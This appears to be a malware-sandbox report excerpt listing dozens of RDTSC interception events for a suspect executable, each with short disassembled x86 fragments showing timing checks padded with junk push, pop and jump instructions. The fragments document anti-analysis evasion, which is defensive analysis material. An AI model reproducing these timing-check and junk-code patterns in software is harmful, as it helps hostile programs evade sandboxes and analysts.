Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A986EE second address: A986F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A986F8 second address: A98719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FFA68B945B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A98865 second address: A98876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnp 00007FFA692CA41Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9BD19 second address: A9BD1F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B3BF second address: A9B3DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA421h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B3DE second address: A9B3F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B3F9 second address: A9B427 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFA692CA422h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFA692CA422h 0x0000000f jne 00007FFA692CA416h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B568 second address: A9B573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B573 second address: A9B577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9B9F4 second address: A9BA04 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFA68B945B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9BA04 second address: A9BA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1376 second address: AA1384 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1384 second address: AA1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1388 second address: AA138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA138C second address: AA1392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1392 second address: AA13A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FFA68B945BAh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA14C3 second address: AA150A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA422h 0x00000009 jnl 00007FFA692CA416h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FFA692CA428h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FFA692CA41Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA150A second address: AA152E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C7h 0x0000000c jnc 00007FFA68B945B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1660 second address: AA167E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 jmp 00007FFA692CA423h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA167E second address: AA1682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA1C32 second address: AA1C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA262D second address: AA263E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FFA68B945B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2BB8 second address: AA2BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2BBC second address: AA2BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2BC0 second address: AA2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFA692CA41Bh 0x00000011 pop edi 0x00000012 jl 00007FFA692CA444h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2BE2 second address: AA2BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2BE6 second address: AA2C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FFA692CA426h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA2EFA second address: AA2EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA4864 second address: AA486A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA486A second address: AA4884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AA9F42 second address: AA9F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FFA692CA416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AADF45 second address: AADF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AACF48 second address: AACF67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e push ecx 0x0000000f jmp 00007FFA692CA41Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AACF67 second address: AACF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FFA68B945C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AACF74 second address: AACF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD0C3 second address: AAD0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFA68B945BFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD0D7 second address: AAD146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA424h 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FFA692CA416h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FFA692CA426h 0x00000017 jmp 00007FFA692CA421h 0x0000001c jmp 00007FFA692CA426h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jp 00007FFA692CA416h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD146 second address: AAD16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C4h 0x00000007 jno 00007FFA68B945B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FFA68B945BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD16C second address: AAD170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD2AB second address: AAD2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD2B2 second address: AAD2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jc 00007FFA692CA41Ah 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD439 second address: AAD443 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD443 second address: AAD449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD449 second address: AAD44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD44F second address: AAD453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD453 second address: AAD459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD459 second address: AAD464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD464 second address: AAD46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD46A second address: AAD4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA428h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FFA692CA426h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD93F second address: AAD943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD943 second address: AAD947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AAD947 second address: AAD957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFA68B945BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AADC1E second address: AADC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AADC22 second address: AADC26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AADC26 second address: AADC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FFA692CA41Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA692CA427h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AB4C9F second address: AB4CF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945B6h 0x00000008 jmp 00007FFA68B945C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnp 00007FFA68B945B6h 0x00000016 jnc 00007FFA68B945B6h 0x0000001c jno 00007FFA68B945B6h 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 pop eax 0x00000029 jmp 00007FFA68B945C7h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AB4FCC second address: AB4FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AB5123 second address: AB5165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FFA68B945B6h 0x0000000c popad 0x0000000d jmp 00007FFA68B945C3h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C8h 0x00000019 je 00007FFA68B945B8h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AB5165 second address: AB5186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFA692CA416h 0x0000000a jmp 00007FFA692CA427h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: AB569E second address: AB56DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007FFA68B945C5h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FFA68B945BEh 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jnc 00007FFA68B945B6h 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABCACE second address: ABCAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABCAD7 second address: ABCADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF400 second address: ABF418 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA692CA41Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF418 second address: ABF427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA68B945B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF427 second address: ABF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AC9153 second address: AC9159 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF53B second address: ACF53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF53F second address: ACF553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BAh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF553 second address: ACF559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1A2A second address: AD1A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FFA68B945B6h 0x0000000c jl 00007FFA68B945B6h 0x00000012 popad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 pushad 0x00000018 jnc 00007FFA68B945B6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1612 second address: AD161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD161A second address: AD1636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jbe 00007FFA68B945B6h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FFA68B945D5h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1636 second address: AD165B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA429h 0x00000009 jc 00007FFA692CA418h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD165B second address: AD1661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63B2 second address: AD63B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63B7 second address: AD63DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFA68B945C9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63DB second address: AD63EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ADE1AC second address: ADE1D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFA68B945BBh 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FFA68B945BDh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE569E second address: AE56A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE56A3 second address: AE56BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE56BB second address: AE56BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE6D6D second address: AE6D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB76D second address: 9FB77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB77F second address: 9FB785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB785 second address: 9FB78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE439 second address: AEE43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9B5 second address: AEE9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA41Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9C7 second address: AEE9CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9CD second address: AEE9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9DA second address: AEE9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9E5 second address: AEE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
